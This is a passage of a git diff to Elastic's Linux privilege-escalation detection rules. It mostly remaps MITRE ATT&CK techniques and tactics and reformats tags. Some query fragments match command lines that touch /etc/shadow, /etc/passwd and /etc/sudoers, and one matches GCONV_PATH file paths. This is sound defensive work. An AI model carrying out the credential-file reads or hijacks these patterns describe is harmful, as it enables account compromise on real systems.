ATT&CK" - -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" [[rule.threat.technique.subtechnique]] -id = "T1003.008" -name = "/etc/passwd and /etc/shadow" -reference = "https://attack.mitre.org/techniques/T1003/008/" +id = "T1222.002" +name = "Linux and Mac File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/002/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml index 1e3ddd54ee1..724edb03756 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_nsswitch_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,6 +119,11 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml index cbb17f3d837..a71a1c7ecf2 100644 --- a/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml +++ b/rules/linux/privilege_escalation_cve_2025_32463_sudo_chroot_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/01" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/10/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,6 +118,16 @@ id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" diff --git a/rules/linux/privilege_escalation_dac_permissions.toml b/rules/linux/privilege_escalation_dac_permissions.toml index d6e99458e84..0071f7af161 100644 --- a/rules/linux/privilege_escalation_dac_permissions.toml +++ b/rules/linux/privilege_escalation_dac_permissions.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/08" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,14 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -118,15 +111,42 @@ process.command_line:(*/etc/sudoers* or */etc/passwd* or */etc/shadow* or */root framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" + +[[rule.threat.technique.subtechnique]] +id = "T1003.008" +name = "/etc/passwd and /etc/shadow" +reference = "https://attack.mitre.org/techniques/T1003/008/" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.004" +name = "Private Keys" +reference = "https://attack.mitre.org/techniques/T1552/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name"] diff --git a/rules/linux/privilege_escalation_enlightenment_window_manager.toml b/rules/linux/privilege_escalation_enlightenment_window_manager.toml index 163762f1cb3..e1b8b16be7c 100644 --- a/rules/linux/privilege_escalation_enlightenment_window_manager.toml +++ b/rules/linux/privilege_escalation_enlightenment_window_manager.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,23 @@ Enlightenment, a Linux window manager, can be exploited for privilege escalation [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.001" +name = "Setuid and Setgid" +reference = "https://attack.mitre.org/techniques/T1548/001/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml index d9f136f68e5..d4788a96ec1 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,24 +104,18 @@ The CAP_SYS_PTRACE capability in Linux allows processes to trace and control oth [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml index b03edb7d5b6..054d95fe8dc 100644 --- a/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml +++ b/rules/linux/privilege_escalation_gdb_sys_ptrace_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -47,16 +47,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -106,53 +97,18 @@ GDB, a debugger, can be granted the CAP_SYS_PTRACE capability, allowing it to tr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [[rule.threat.technique.subtechnique]] id = "T1055.008" name = "Ptrace System Calls" reference = "https://attack.mitre.org/techniques/T1055/008/" - -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/linux/privilege_escalation_kworker_uid_elevation.toml b/rules/linux/privilege_escalation_kworker_uid_elevation.toml index 5c695d128cc..7d5039f65fc 100644 --- a/rules/linux/privilege_escalation_kworker_uid_elevation.toml +++ b/rules/linux/privilege_escalation_kworker_uid_elevation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ Kworker processes are integral to Linux, handling tasks like interrupts and back [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.013" -name = "KernelCallbackTable" -reference = "https://attack.mitre.org/techniques/T1574/013/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml index 046ac09030c..a6d82d08750 100644 --- a/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml +++ b/rules/linux/privilege_escalation_ld_preload_shared_object_modif.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,15 +93,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit - For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -124,11 +116,28 @@ id = "T1574.006" name = "Dynamic Linker Hijacking" reference = "https://attack.mitre.org/techniques/T1574/006/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id"] diff --git a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml index af3b13bbbe3..b3d0de5378e 100644 --- a/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml +++ b/rules/linux/privilege_escalation_linux_suspicious_symbolic_link.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -46,15 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -118,29 +110,24 @@ Symbolic links in Linux are shortcuts that point to files or directories, facili framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" - -[[rule.threat.technique.subtechnique]] -id = "T1003.008" -name = "/etc/passwd and /etc/shadow" -reference = "https://attack.mitre.org/techniques/T1003/008/" +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml index e2af607fc77..a34e1b9a628 100644 --- a/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml +++ b/rules/linux/privilege_escalation_load_and_unload_of_kernel_via_kexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,20 +93,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -122,47 +109,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.006" -name = "Kernel Modules and Extensions" -reference = "https://attack.mitre.org/techniques/T1547/006/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1601" name = "Modify System Image" reference = "https://attack.mitre.org/techniques/T1601/" -[[rule.threat.technique.subtechnique]] -id = "T1601.001" -name = "Patch System Image" -reference = "https://attack.mitre.org/techniques/T1601/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml index 9df3d417f82..1fe818619b2 100644 --- a/rules/linux/privilege_escalation_pkexec_envar_hijack.toml +++ b/rules/linux/privilege_escalation_pkexec_envar_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -100,31 +100,23 @@ file where host.os.type == "linux" and file.path : "/*GCONV_PATH*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.007" -name = "Path Interception by PATH Environment Variable" -reference = "https://attack.mitre.org/techniques/T1574/007/" - +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml index 57ae0855eb1..8859e41599e 100644 --- a/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml +++ b/rules/linux/privilege_escalation_potential_bufferoverflow_attack.toml @@ -1,7 +1,7 @@ [metadata] creation_date = "2023/12/11" maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,29 +83,29 @@ Buffer overflow attacks exploit vulnerabilities in software to execute arbitrary [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1068" +name = "Exploitation for Privilege Escalation" +reference = "https://attack.mitre.org/techniques/T1068/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.threshold] field = ["event.kind", "host.id"] value = 100 diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml index f7d626e37d7..7aa6f9831f5 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_exploitation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,15 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -141,11 +133,6 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -160,11 +147,3 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml index 6073256d5ec..69a21b3669b 100644 --- a/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml +++ b/rules/linux/privilege_escalation_potential_suid_sgid_proxy_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,16 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,11 +116,6 @@ not process.parent.executable in ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" @@ -144,24 +130,3 @@ reference = "https://attack.mitre.org/techniques/T1548/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -name = "Defense Evasion" -id = "TA0005" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" diff --git a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml index c214967001f..37598c101d8 100644 --- a/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml +++ b/rules/linux/privilege_escalation_potential_wildcard_shell_spawn.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/28" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,17 +81,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] type = "eql" query = ''' sequence by host.id with maxspan=1s @@ -113,24 +103,16 @@ sequence by host.id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml index d916e1256e9..11888270c0a 100644 --- a/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml +++ b/rules/linux/privilege_escalation_sda_disk_mount_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,16 +97,11 @@ DebugFS is a Linux utility that provides a low-level interface to access and man framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" +id = "T1006" +name = "Direct Volume Access" +reference = "https://attack.mitre.org/techniques/T1006/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/privilege_escalation_shadow_file_read.toml b/rules/linux/privilege_escalation_shadow_file_read.toml index e4e20b3b750..720aed99079 100644 --- a/rules/linux/privilege_escalation_shadow_file_read.toml +++ b/rules/linux/privilege_escalation_shadow_file_read.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Privilege Escalation", - "Tactic: Credential Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: 